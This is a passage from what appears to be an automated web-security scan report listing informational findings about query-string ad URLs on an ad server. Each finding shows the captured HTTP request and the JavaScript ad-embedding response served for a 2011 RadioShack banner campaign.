document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=44637896=_4d436f07,4152680175,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=44637896/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/806261365/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=806261365?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=44637896=_4d436f07,4152680175,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=44637896/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/806261365/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=806261365?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=806261365?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.111. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14171843173@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14171843173@x90

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/14171843173@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=35886031=_4d4387c7,4171843173,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=35886031/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296270995

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:21:54 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=35886031=_4d4387c7,4171843173,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=35886031/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1370845975/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1370845975?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=35886031=_4d4387c7,4171843173,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=35886031/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1370845975/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1370845975?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=35886031=_4d4387c7,4171843173,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=35886031/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1370845975/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1370845975?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1370845975?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.112. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15457540452@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15457540452@x90

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15457540452@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=61538420=_4d4374ef,5457540452,766159^950193^1183^0,1_/xsxdata=$XSXDATA/bnum=61538420/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660; session=1296256112|1296264969

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 02:01:21 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=61538420=_4d4374ef,5457540452,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=61538420/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1624211567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1624211567?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=61538420=_4d4374ef,5457540452,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=61538420/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1624211567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1624211567?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950193/cstr=61538420=_4d4374ef,5457540452,766159_950193_1183_0,1_/xsxdata=$XSXDATA/bnum=61538420/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1624211567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1624211567?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1624211567?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.113. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=38526334=_4d435ae2,5563376530,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=38526334/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; session=1296256112|1296259319

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:01 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3189
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=38526334=_4d435ae2,5563376530,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=38526334/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/118917393/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=118917393?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=38526334=_4d435ae2,5563376530,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=38526334/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/118917393/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=118917393?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=38526334=_4d435ae2,5563376530,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=38526334/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/118917393/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=118917393?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=118917393?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.114. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15563376530@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=38526334=_4d435ae2,5563376530,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=38526334/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e3f45525d5f4f58455e445a4a423660; session=1296256112|1296259319

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 00:10:10 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3189
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e6e45525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=38526334=_4d435ae2,5563376530,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=38526334/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/394936567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=394936567?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=38526334=_4d435ae2,5563376530,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=38526334/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/394936567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=394936567?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=38526334=_4d435ae2,5563376530,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=38526334/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/394936567/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=394936567?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=394936567?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.115. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15741228112@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15741228112@x90

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/15741228112@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=16203302=_4d4383bd,5741228112,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=16203302/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e2045525d5f4f58455e445a4a423660; session=1296256112|1296269957

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 03:04:37 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=16203302=_4d4383bd,5741228112,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=16203302/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1326230958/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1326230958?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=16203302=_4d4383bd,5741228112,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=16203302/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1326230958/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1326230958?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=16203302=_4d4383bd,5741228112,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=16203302/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1326230958/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1326230958?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1326230958?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.116. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=94855831=_4d436e11,6224341745,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=94855831/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; Dominos=DataXuB3; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj; other_20110126=set; dlx_XXX=set; dlx_20100929=set; ATTWL=CollectiveB3; NSC_o4efm_qppm_iuuq=ffffffff09419e5145525d5f4f58455e445a4a423660; session=1296256112|1296263988

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:57:02 GMT
Server: Apache/2.0.52 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 3198
Content-Type: application/x-javascript
Set-Cookie: NSC_o4efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/

document.write ('<IFRAME SRC="http://ad.doubleclick.net/adi/N3867.270604.B3/B5128597.6;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=94855831=_4d436e11,6224341745,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=94855831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1781742657/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1781742657?" WIDTH=300 HEIGHT=250 MARGINWIDTH=0 MARGINHEIGHT=0 HSPACE=0 VSPACE=0 FRAMEBORDER=0 SCROLLING=no BORDERCOLOR=');
document.write ("'");
document.write ('#000000');
document.write ("'");
document.write ('>
\n');
document.write ('<SCRIPT language=');
document.write ("'");
document.write ('JavaScript1.1');
document.write ("'");
document.write (' SRC="http://ad.doubleclick.net/adj/N3867.270604.B3/B5128597.6;abr=!ie;sz=300x250;click0=http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=94855831=_4d436e11,6224341745,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=94855831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1781742657/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?;ord=1781742657?">
\n');
document.write ('</SCRIPT>
...[SNIP]...
<NOSCRIPT>\n');
document.write ('<A HREF="http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=94855831=_4d436e11,6224341745,766159_950190_1183_0,1_/xsxdata=$XSXDATA/bnum=94855831/optn=64?trg=http://b3.mookie1.com/RealMedia/ads/click_lx.ads/AOLB3/RadioShack/SELL_2011Q1/CPA/300/L36/1781742657/x90/USNetwork/RS_SELL_2011Q1_AOL_CPA_300/RadioShack_SELL_2011Q1.html/72634857383030695a694d41416f6366?http://ad.doubleclick.net/jump/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1781742657?">\n');
document.write ('<IMG SRC="http://ad.doubleclick.net/ad/N3867.270604.B3/B5128597.6;abr=!ie4;abr=!ie5;sz=300x250;ord=1781742657?" BORDER=0 WIDTH=300 HEIGHT=250 ALT="Advertisement"></A>
...[SNIP]...

17.117. http://b3.mookie1.com/3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90

Summary

Severity:   Information
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90

Issue detail

The page was loaded from a URL containing a query string:
The response contains the following links to other domains:

Request

GET /3/AOLB3/RadioShack/SELL_2011Q1/CPA/300/16224341745@x90?http://r1-ads.ace.advertising.com/click/site=0000766159/mnum=0000950190/cstr=94855831=_4d436e11,6224341745,766159^950190^1183^0,1_/xsxdata=$XSXDATA/bnum=94855831/optn=64?trg= HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.bostonherald.com/includes/processAds.bg?position=Middle1&companion=Top,Middle,Middle1,Bottom&page=bh.heraldinteractive.com%2Ftrack%2Fhome
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
